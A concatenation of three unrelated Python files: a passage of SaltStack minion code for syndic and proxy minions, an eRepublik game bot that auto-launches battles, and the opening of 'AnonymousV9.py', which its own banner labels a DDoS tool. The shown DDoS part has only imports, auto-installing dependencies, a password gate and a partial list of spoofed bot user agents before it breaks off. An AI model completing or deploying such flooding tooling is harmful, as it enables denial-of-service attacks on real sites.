log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to false in Neon Salt release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
if self.opts.get('proxy_merge_pillar_in_opts'):
# Override proxy opts with pillar data when the user required.
self.opts = salt.utils.dictupdate.merge(self.opts,
self.opts['pillar'],
strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
elif self.opts.get('proxy_mines_pillar'):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if 'mine_interval' in self.opts['pillar']:
self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
if 'mine_functions' in self.opts['pillar']:
general_proxy_mines = self.opts.get('mine_functions', [])
specific_proxy_mines = self.opts['pillar']['mine_functions']
try:
self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error('Unable to merge mine functions from the pillar in the opts, for proxy {}'.format(
self.opts['id']))
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
if self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')],
proxy=self.proxy)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# proxy keepalive
proxy_alive_fn = fq_proxyname+'.alive'
if (proxy_alive_fn in self.proxy
and 'status.proxy_reconnect' in self.functions
and self.opts.get('proxy_keep_alive', True)):
# if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
self.schedule.add_job({
'__proxy_keepalive':
{
'function': 'status.proxy_reconnect',
'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {
'proxy_name': fq_proxyname
}
}
}, persist=True)
self.schedule.enable_schedule()
else:
self.schedule.delete_job('__proxy_keepalive', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
# Need to load the modules so they get all the dunder variables
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
# Pull in the utils
minion_instance.utils = salt.loader.utils(minion_instance.opts)
# Then load the proxy module
minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
# And re-load the modules so the __proxy__ variable gets injected
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
minion_instance.proxy.pack['__salt__'] = minion_instance.functions
minion_instance.proxy.pack['__ret__'] = minion_instance.returners
minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
minion_instance.proxy.pack['__utils__'] = minion_instance.utils
# Reload all modules so all dunder variables are injected
minion_instance.proxy.reload_modules()
fq_proxyname = opts['proxy']['proxytype']
minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
proxy_init_fn(opts)
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
battle_launcher.py
|
import threading
from datetime import timedelta
from erepublik import Citizen, utils
CONFIG = {
'email': '[email protected]',
'password': 'Pa$5w0rd!',
'interactive': True,
'fight': True,
'debug': True,
'start_battles': {
121672: {"auto_attack": False, "regions": [661]},
125530: {"auto_attack": False, "regions": [259]},
125226: {"auto_attack": True, "regions": [549]},
124559: {"auto_attack": True, "regions": [176]}
}
}
def _battle_launcher(player: Citizen):
"""Launch battles. Check every 5th minute (0,5,10...45,50,55) if any battle could be started on specified regions
and after launching wait for 90 minutes before starting next attack so that all battles aren't launched at the same
time. If player is allowed to fight, do 100 hits on the first round in players division.
:param player: Logged in Citizen instance
":type player: Citizen
"""
global CONFIG
finished_war_ids = {*[]}
war_data = CONFIG.get('start_battles', {})
war_ids = {int(war_id) for war_id in war_data.keys()}
next_attack_time = player.now
next_attack_time = next_attack_time.replace(minute=next_attack_time.minute // 5 * 5, second=0)
while not player.stop_threads.is_set():
try:
attacked = False
player.update_war_info()
running_wars = {b.war_id for b in player.all_battles.values()}
for war_id in war_ids - finished_war_ids - running_wars:
war = war_data[str(war_id)]
war_regions = set(war.get('regions'))
auto_attack = war.get('auto_attack')
status = player.get_war_status(war_id)
if status.get('ended', False):
CONFIG['start_battles'].pop(str(war_id), None)
finished_war_ids.add(war_id)
continue
elif not status.get('can_attack'):
continue
if auto_attack or (player.now.hour > 20 or player.now.hour < 2):
for reg in war_regions:
if attacked:
break
if reg in status.get('regions', {}).keys():
player.launch_attack(war_id, reg, status.get('regions', {}).get(reg))
attacked = True
hits = 100
if player.energy.food_fights >= hits and player.config.fight:
for _ in range(120):
player.update_war_info()
battle_id = player.get_war_status(war_id).get("battle_id")
if battle_id is not None and battle_id in player.all_battles:
player.fight(battle_id, player.details.citizenship, hits)
break
player.sleep(1)
if attacked:
break
if attacked:
break
war_ids -= finished_war_ids
if attacked:
next_attack_time = utils.good_timedelta(next_attack_time, timedelta(hours=1, minutes=30))
else:
next_attack_time = utils.good_timedelta(next_attack_time, timedelta(minutes=5))
player.stop_threads.wait(utils.get_sleep_seconds(next_attack_time))
except:
player.report_error("Task error: start_battles")
def main():
player = Citizen(email=CONFIG['email'], password=CONFIG['password'], auto_login=False)
player.config.interactive = CONFIG['interactive']
player.config.fight = CONFIG['fight']
player.set_debug(CONFIG.get('debug', False))
player.login()
if CONFIG.get('start_battles'):
name = "{}-start_battles-{}".format(player.name, threading.active_count() - 1)
state_thread = threading.Thread(target=_battle_launcher, args=(player,), name=name)
state_thread.start()
if __name__ == "__main__":
main()
|
AnonymousV9.py
|
#import module
import os,sys
try:
import socks, requests, wget, cfscrape, urllib3
except:
if sys.platform.startswith("linux"):
os.system("pip3 install pysocks requests wget cfscrape urllib3 scapy")
elif sys.platform.startswith("freebsd"):
os.system("pip3 install pysocks requests wget cfscrape urllib3 scapy")
else:
os.system("pip install pysocks requests wget cfscrape urllib3 scapy")
import random, socket, threading
import os, socket, threading, colorsys, time, random
import socket
import sys
import os
import time
import random
import threading
import base64 as b64
from types import MethodType
import string
import json
import sys
import signal
from os import system,name
os.system('color ' +random.choice(['B'])+ " & cls & UZI WATZEN DDOS [ Buka Password ]")
password = input("[ + ] Masukan Password Tools : ")
if password == "UziWatzen":
print("\033[1;32;37m Password Yang Anda Masukan Benar")
time.sleep(5)
else :
print("\033[1;32;37mPassword Yang Anda Masukan Salah")
time.sleep(100000000000000000000000000000)
useragents = [
"AdsBot-Google ( http://www.google.com/adsbot.html)",
"Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)",
"TelegramBot (like TwitterBot)"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 TelegramBot (like TwitterBot)"
"Mozilla/5.0 (compatible; YandexAdNet/1.0; +http://yandex.com/bots)"
"Mozilla/5.0 (compatible; Cloudflare-Smart-Transit/1.0; +https://www.cloudflare.com/"
"Mozilla/5.0 (Linux; Android 5.0; SM-G920A) AppleWebKit (KHTML, like Gecko) Chrome Mobile Safari (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)"
"Googlebot/2.1 (+http://www.google.com/bot.html)" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html)"
"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
"Mozilla/5.0 (Slurp/cat; [email protected]; http://www.inktomi.com/slurp.html)"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/536.28.10 (KHTML, like Gecko) Version/6.0.3 Safari/536.28.10",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
